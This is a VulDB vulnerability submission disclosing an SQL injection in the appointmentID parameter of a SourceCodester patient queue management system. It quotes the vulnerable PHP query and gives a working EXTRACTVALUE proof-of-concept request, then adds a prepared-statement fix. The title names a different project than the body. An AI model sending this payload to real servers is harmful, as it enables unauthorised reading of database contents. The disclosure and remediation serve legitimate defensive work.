| Title | SourceCodester User-Management-PHP-MYSQL web v1 SQL Injection |
|---|---|
| Source | ⚠️ http://x.x.x.x:8888/pqms/php/api_patient_checkin.php?appointmentID=appointmentID=WALK202507056%27%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20@@version),0x7e))--%20 |
| User | 0CTL0 (UID 92069) |
| Submission | 10/28/2025 03:10 (4 Wurɗi ago) |
| Moderation | 11/13/2025 13:15 (16 days later) |
| Status | Accepted |
| VulDB Entry | 332350 [SourceCodester Patients Waiting Area Queue Management System 1.0 api_patient_checkin.php getPatientAppointment appointmentID SQL Injection] |
| Points | 20 |

Description (as submitted):

1. The address of the open-source project (PQMS) with the vulnerability: https://www.sourcecodester.com/php/18348/patients-waiting-area-queue-management-system.html

2. There is an SQL injection vulnerability in the reference_number attribute on line 183 of the pqms/php/api_patient_checkin.php file:

```php
// $appid is interpolated directly into the SQL string, unescaped and unparameterised
$res = mysqli_query($db, "SELECT a.*, s.first_name AS fname,s.last_name AS lname,
p.first_name,p.last_name,t.name AS appoint_name
FROM checkins a
INNER JOIN patients p ON p.id = a.patient_id
LEFT JOIN staff s ON s.id = a.doctor_id
LEFT JOIN appointment_types t ON t.id = a.app_type_id
WHERE a.reference_number = '$appid' ");
```

3. Deploy PQMS and verify using the XPath syntax error echo mechanism of the MySQL function EXTRACTVALUE(xml_doc, xpath); a returned version number such as XPATH syntax error: '~5.7.28~' means the injection exists. Verification PoC:

```http
GET /pqms/php/api_patient_checkin.php?appointmentID=appointmentID=WALK202507056%27%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20@@version),0x7e))--%20 HTTP/1.1
Host: x.x.x.x:8888
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: close
```
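The remediation a reviewer would expect for the query quoted in the submission, as an added example that is not part of the submission or of the PQMS code base: the same SELECT rewritten as a mysqli prepared statement, so the value of the `appointmentID` request parameter is bound as data and can no longer alter the SQL text. The `getPatientAppointment` name is taken from the VulDB entry title; the connection details, the JSON response shape, the `[A-Z0-9]` format of a reference number (inferred from the `WALK202507056` value in the PoC) and the use of `get_result()` (which needs the mysqlnd driver) are assumptions.

```php
<?php
// Added example, not PQMS code. Assumes a mysqli connection with exceptions
// enabled; host, user, password and database name are placeholders.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
$db = new mysqli('127.0.0.1', 'pqms', 'secret', 'pqms');

/**
 * Look up a check-in by its reference number.
 * The SQL text is fixed at compile time; $appid travels to the server as a
 * bound string parameter, so a quote or comment sequence inside it is just
 * characters to compare against a.reference_number.
 */
function getPatientAppointment(mysqli $db, string $appid): ?array
{
    $sql = "SELECT a.*, s.first_name AS fname, s.last_name AS lname,
                   p.first_name, p.last_name, t.name AS appoint_name
            FROM checkins a
            INNER JOIN patients p ON p.id = a.patient_id
            LEFT JOIN staff s ON s.id = a.doctor_id
            LEFT JOIN appointment_types t ON t.id = a.app_type_id
            WHERE a.reference_number = ?";
    $stmt = $db->prepare($sql);
    $stmt->bind_param('s', $appid);          // 's' marks the value as a string parameter
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // requires mysqlnd (assumption)
    $stmt->close();
    return $row ?: null;
}

/**
 * Defence in depth on top of the prepared statement: reject anything that does
 * not look like a reference number before it reaches the database. The format
 * is assumed from the PoC value WALK202507056, not taken from the PQMS source.
 */
function isValidReferenceNumber(string $appid): bool
{
    return preg_match('/^[A-Z0-9]{1,32}$/', $appid) === 1;
}

// Request handling for the endpoint (response format assumed).
header('Content-Type: application/json');
$appid = $_GET['appointmentID'] ?? '';

if (!isValidReferenceNumber($appid)) {
    // The PoC payload "WALK202507056' AND EXTRACTVALUE(...)-- " fails this check
    // on the quote and spaces; even without the check, the prepared statement
    // would compare it literally and return no row instead of leaking @@version.
    http_response_code(400);
    echo json_encode(['error' => 'invalid appointmentID']);
    exit;
}

echo json_encode(getPatientAppointment($db, $appid));
```

The allow-list is optional; the prepared statement alone removes the injection. Keeping both means a malformed identifier is rejected with a 400 before a query is issued, which also keeps EXTRACTVALUE-style error messages from ever being generated by this code path.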